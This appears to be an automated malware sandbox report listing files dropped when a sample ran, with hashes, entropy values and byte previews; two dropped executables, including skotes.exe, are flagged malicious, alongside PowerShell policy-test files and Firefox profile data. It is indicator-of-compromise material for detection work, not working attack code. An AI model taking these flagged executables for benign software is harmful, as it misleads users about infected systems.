                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2810368
                                                                                                                                                                                                                            Entropy (8bit):6.474438374061188
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:nV/m2/B+kJrzSbN+PGKEMgJ/NF+WmyliJuDy0O+YroxNoBMECq8Ypa:Vu2nZSbQU9J/NF+WmbJu
                                                                                                                                                                                                                            MD5:A55D697A530E905F6C6539469BA973BD
                                                                                                                                                                                                                            SHA1:A6901B1E614C610538E71F171FEC23D515402831
                                                                                                                                                                                                                            SHA-256:09F3469875A5AE90958DFC043B7677630DD2868C42FC9088C97DAF54A7F2ECFE
                                                                                                                                                                                                                            SHA-512:2E94B5026B10D146AEAAA17B2CE34A400C2049BC50EC7B39D84B53ACC402DEBD76594CF24A71AF65A0FA41A9A433968313DB8B946A0F5AB419D2BC91A2D58811
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... +.. ...`....@.. .......................`+......#+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...rqcwpexm.`*......T*..h..............@...viefdblt. ....+.......*.............@....taggant.@... +.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0ccww5f.imn.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3bvjvkp.4l3.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kq2bj0xa.2qm.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yekjoldp.zxh.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\cMTqzvmx9u.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3238912
                                                                                                                                                                                                                            Entropy (8bit):6.625976257413819
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:aUnOVfsVG4mPq3wMSk7+7NNnAXbfHQfiXCbSByOPssk:vnafcXmPUwMSk7+TnuLyTO0
                                                                                                                                                                                                                            MD5:0A8673BBEA31AE21E9E87BE408752436
                                                                                                                                                                                                                            SHA1:A8C29DF353C7AF7928CE3E24A9F606F0787109AC
                                                                                                                                                                                                                            SHA-256:E2AE261A55BC83C0E3C9AB657A16D2C76A329B6A4FF40370119E079F2631B69C
                                                                                                                                                                                                                            SHA-512:31D1336CF35ADECBED5D42E6910B24FBE01E4671AA12815C5D1D00B27F93228F35F290F570C4142622D53F8B91B4ADC764020EC2D52A5ED18794308EBC64AAD3
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................p1...........@...........................1.......1...@.................................W...k............................[1..............................Z1..................................................... . ............................@....rsrc...............................@....idata ............................@...qbaikvfg..*.......*.................@...scclittj.....`1......D1.............@....taggant.0...p1.."...J1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\cMTqzvmx9u.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                            Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                            MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                            SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                            SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                            SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):453023
                                                                                                                                                                                                                            Entropy (8bit):7.997718157581587
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:tESTeqTI2r4ZbCgUKWKNeRcPMb6qlV7hVZe3:tEsed2Xh9/bdzZe3
                                                                                                                                                                                                                            MD5:85430BAED3398695717B0263807CF97C
                                                                                                                                                                                                                            SHA1:FFFBEE923CEA216F50FCE5D54219A188A5100F41
                                                                                                                                                                                                                            SHA-256:A9F4281F82B3579581C389E8583DC9F477C7FD0E20C9DFC91A2E611E21E3407E
                                                                                                                                                                                                                            SHA-512:06511F1F6C6D44D076B3C593528C26A602348D9C41689DBF5FF716B671C3CA5756B12CB2E5869F836DEDCE27B1A5CFE79B93C707FD01F8E84B620923BB61B5F1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK.........bN...R..........gmpopenh264.dll..|.E.0.=..I.....1....4f1q.`.........q.....'+....h*m{.z..o_.{w........$..($A!...|L...B&A2.s.{..Dd......c.U.U..9u.S...K.l`...../.d.-....|.....&....9......wn..x......i.#O.+.Y.l......+....,3.3f..\..c.SSS,............N...GG...F.'.&.:'.K.Z&.>.@.g..M...M.`...*.........ZR....^jg.G.Kb.o~va.....<Z..1.#.O.e.....D..X..i..$imBW..Q&.......P.....,M.,..:.c...-...\......*.....-i.K.I..4.a..6..*...Ov=...W..F.CH.>...a.'.x...#@f...d..u.1....OV.1o}....g.5.._.3.J.Hi.Z.ipM....b.Z....%.G..F................/..3.q..J.....o...%.g.N.*.}..).3.N%.!..q*........^I.m..~...6.#.~+.....A...I]r...x..*.<IYj....p0..`S.M@.E..f.=.;!.@.....E..E....... .0.n....Jd..d......uM.-.qI.lR..z..=}..r.D.XLZ....x.$..|c.1.cUkM.&.Qn]..a]t.h..*.!.6 7..Jd.DvKJ"Wgd*%n...w...Jni.inmr.@M.$'Z.s....#)%..Rs..:.h....R....\..t.6..'.g.........Uj+F.cr:|..!..K.W.Y...17......,....r.....>.N..3.R.Y.._\...Ir.DNJdM... .k...&V-....z.%...-...D..i..&...6....7.2T).>..0..%.&.

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40371339ad31a7e6.customDestinations-ms (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5488
                                                                                                                                                                                                                            Entropy (8bit):3.3061214222521866
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:O0d0CXUgdwBzU0d0CR6BdwXy0d0CRadwV1:OgoqIL
                                                                                                                                                                                                                            MD5:970D2D0105CA67577CA1ADB04A9400A8
                                                                                                                                                                                                                            SHA1:D679224DD3DCCE185256BC28B0C9A11FE28C5800
                                                                                                                                                                                                                            SHA-256:D9D1678F3CAD13D37E5AD557ABF653D8BA4946FB2C6FF00C5316803D131E7998
                                                                                                                                                                                                                            SHA-512:9660364B0970C28CAB039F4BAC25778389752E3684B493F7092BEB0F780F641DBAB4020D2485414AA315452B9DB4C64E6E14D6D1243DCC0241286B61CDBC6E5F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:...................................FL..................F.@.. ...p.......n....U..........S...........................P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.S....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....h.1.....CW.X..MOZILL~1..P......CW}W.Y.S............................>.M.o.z.i.l.l.a. .F.i.r.e.f.o.x.....b.2..S..<W,. .firefox.exe.H......CW}W.Y.S..............................f.i.r.e.f.o.x...e.x.e.......[...............-.......Z............<.......C:\Program Files\Mozilla Firefox\firefox.exe....O.p.e.n. .a. .n.e.w. .b.r.o.w.s.e.r. .t.a.b.....-.n.e.w.-.t.a.b. .a.b.o.u.t.:.b.l.a.n.k.,.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.o.z.i.l.l.a. .F.i.r.e.f.o.x.\.f.i.r.e.f.o.x...e.x.e.........%ProgramFiles%\Mozilla Firefox\firefox.exe................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5488
                                                                                                                                                                                                                            Entropy (8bit):3.3061214222521866
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:O0d0CXUgdwBzU0d0CR6BdwXy0d0CRadwV1:OgoqIL
                                                                                                                                                                                                                            MD5:970D2D0105CA67577CA1ADB04A9400A8
                                                                                                                                                                                                                            SHA1:D679224DD3DCCE185256BC28B0C9A11FE28C5800
                                                                                                                                                                                                                            SHA-256:D9D1678F3CAD13D37E5AD557ABF653D8BA4946FB2C6FF00C5316803D131E7998
                                                                                                                                                                                                                            SHA-512:9660364B0970C28CAB039F4BAC25778389752E3684B493F7092BEB0F780F641DBAB4020D2485414AA315452B9DB4C64E6E14D6D1243DCC0241286B61CDBC6E5F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:...................................FL..................F.@.. ...p.......n....U..........S...........................P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.S....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....h.1.....CW.X..MOZILL~1..P......CW}W.Y.S............................>.M.o.z.i.l.l.a. .F.i.r.e.f.o.x.....b.2..S..<W,. .firefox.exe.H......CW}W.Y.S..............................f.i.r.e.f.o.x...e.x.e.......[...............-.......Z............<.......C:\Program Files\Mozilla Firefox\firefox.exe....O.p.e.n. .a. .n.e.w. .b.r.o.w.s.e.r. .t.a.b.....-.n.e.w.-.t.a.b. .a.b.o.u.t.:.b.l.a.n.k.,.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.o.z.i.l.l.a. .F.i.r.e.f.o.x.\.f.i.r.e.f.o.x...e.x.e.........%ProgramFiles%\Mozilla Firefox\firefox.exe................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PTJX520EY5P2GRLHR4EB.temp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5488
                                                                                                                                                                                                                            Entropy (8bit):3.3061214222521866
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:O0d0CXUgdwBzU0d0CR6BdwXy0d0CRadwV1:OgoqIL
                                                                                                                                                                                                                            MD5:970D2D0105CA67577CA1ADB04A9400A8
                                                                                                                                                                                                                            SHA1:D679224DD3DCCE185256BC28B0C9A11FE28C5800
                                                                                                                                                                                                                            SHA-256:D9D1678F3CAD13D37E5AD557ABF653D8BA4946FB2C6FF00C5316803D131E7998
                                                                                                                                                                                                                            SHA-512:9660364B0970C28CAB039F4BAC25778389752E3684B493F7092BEB0F780F641DBAB4020D2485414AA315452B9DB4C64E6E14D6D1243DCC0241286B61CDBC6E5F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:...................................FL..................F.@.. ...p.......n....U..........S...........................P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.S....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....h.1.....CW.X..MOZILL~1..P......CW}W.Y.S............................>.M.o.z.i.l.l.a. .F.i.r.e.f.o.x.....b.2..S..<W,. .firefox.exe.H......CW}W.Y.S..............................f.i.r.e.f.o.x...e.x.e.......[...............-.......Z............<.......C:\Program Files\Mozilla Firefox\firefox.exe....O.p.e.n. .a. .n.e.w. .b.r.o.w.s.e.r. .t.a.b.....-.n.e.w.-.t.a.b. .a.b.o.u.t.:.b.l.a.n.k.,.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.o.z.i.l.l.a. .F.i.r.e.f.o.x.\.f.i.r.e.f.o.x...e.x.e.........%ProgramFiles%\Mozilla Firefox\firefox.exe................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SU97NB2EA7SMK3QHPKON.temp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5488
                                                                                                                                                                                                                            Entropy (8bit):3.3061214222521866
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:O0d0CXUgdwBzU0d0CR6BdwXy0d0CRadwV1:OgoqIL
                                                                                                                                                                                                                            MD5:970D2D0105CA67577CA1ADB04A9400A8
                                                                                                                                                                                                                            SHA1:D679224DD3DCCE185256BC28B0C9A11FE28C5800
                                                                                                                                                                                                                            SHA-256:D9D1678F3CAD13D37E5AD557ABF653D8BA4946FB2C6FF00C5316803D131E7998
                                                                                                                                                                                                                            SHA-512:9660364B0970C28CAB039F4BAC25778389752E3684B493F7092BEB0F780F641DBAB4020D2485414AA315452B9DB4C64E6E14D6D1243DCC0241286B61CDBC6E5F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:...................................FL..................F.@.. ...p.......n....U..........S...........................P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.S....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....h.1.....CW.X..MOZILL~1..P......CW}W.Y.S............................>.M.o.z.i.l.l.a. .F.i.r.e.f.o.x.....b.2..S..<W,. .firefox.exe.H......CW}W.Y.S..............................f.i.r.e.f.o.x...e.x.e.......[...............-.......Z............<.......C:\Program Files\Mozilla Firefox\firefox.exe....O.p.e.n. .a. .n.e.w. .b.r.o.w.s.e.r. .t.a.b.....-.n.e.w.-.t.a.b. .a.b.o.u.t.:.b.l.a.n.k.,.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.o.z.i.l.l.a. .F.i.r.e.f.o.x.\.f.i.r.e.f.o.x...e.x.e.........%ProgramFiles%\Mozilla Firefox\firefox.exe................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6150
                                                                                                                                                                                                                            Entropy (8bit):4.940537187461634
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:7LFS+O1U6OdwiOdEiVoslH5jV/ZiwBhZ08jzL0b8P:N5dimslH5jVhiwBrJ
                                                                                                                                                                                                                            MD5:DD61EA9E3A183D0B2BB4DD7D9437CD97
                                                                                                                                                                                                                            SHA1:C0B65997652BAF5BB13A9B113A81065FA130017D
                                                                                                                                                                                                                            SHA-256:93C1753D4B55F616B63AA7B8CB4E038288A7EBDD4EDBFD2708DF4ECED24E42A3
                                                                                                                                                                                                                            SHA-512:97C227F6583F986DC18239DA160D7FBAAFEBF2ABDC8390D9DF53B4D3FB21AE44F980118BBCC69D85CDBA0903FE25F97D504497804E238C4917C32B856AE43763
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"bookmarks-toolbar-default-on":{"slug":"bookmarks-toolbar-default-on","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{},"enabled":true,"featureId":"bookmarks"}]},"active":true,"enrollmentId":"fbda1f9b-e03c-4207-94bb-3e5ec8a299dc","experimentType":"nimbus","source":"rs-loader","userFacingName":"Bookmarks Toolbar Default On","userFacingDescription":"An experiment that turns the bookmarks toolbar on by default.","lastSeen":"2023-10-05T08:19:30.130Z","featureIds":["bookmarks"],"prefs":[],"isRollout":false},"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"cdbde02e-86fb-4899-ad8a-776106784576","experimentType":"r

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6150
                                                                                                                                                                                                                            Entropy (8bit):4.940537187461634
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:7LFS+O1U6OdwiOdEiVoslH5jV/ZiwBhZ08jzL0b8P:N5dimslH5jVhiwBrJ
                                                                                                                                                                                                                            MD5:DD61EA9E3A183D0B2BB4DD7D9437CD97
                                                                                                                                                                                                                            SHA1:C0B65997652BAF5BB13A9B113A81065FA130017D
                                                                                                                                                                                                                            SHA-256:93C1753D4B55F616B63AA7B8CB4E038288A7EBDD4EDBFD2708DF4ECED24E42A3
                                                                                                                                                                                                                            SHA-512:97C227F6583F986DC18239DA160D7FBAAFEBF2ABDC8390D9DF53B4D3FB21AE44F980118BBCC69D85CDBA0903FE25F97D504497804E238C4917C32B856AE43763
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"bookmarks-toolbar-default-on":{"slug":"bookmarks-toolbar-default-on","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{},"enabled":true,"featureId":"bookmarks"}]},"active":true,"enrollmentId":"fbda1f9b-e03c-4207-94bb-3e5ec8a299dc","experimentType":"nimbus","source":"rs-loader","userFacingName":"Bookmarks Toolbar Default On","userFacingDescription":"An experiment that turns the bookmarks toolbar on by default.","lastSeen":"2023-10-05T08:19:30.130Z","featureIds":["bookmarks"],"prefs":[],"isRollout":false},"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"cdbde02e-86fb-4899-ad8a-776106784576","experimentType":"r

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):24
                                                                                                                                                                                                                            Entropy (8bit):3.91829583405449
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                                                                                                                                                            MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                                                            SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                                                            SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                                                            SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
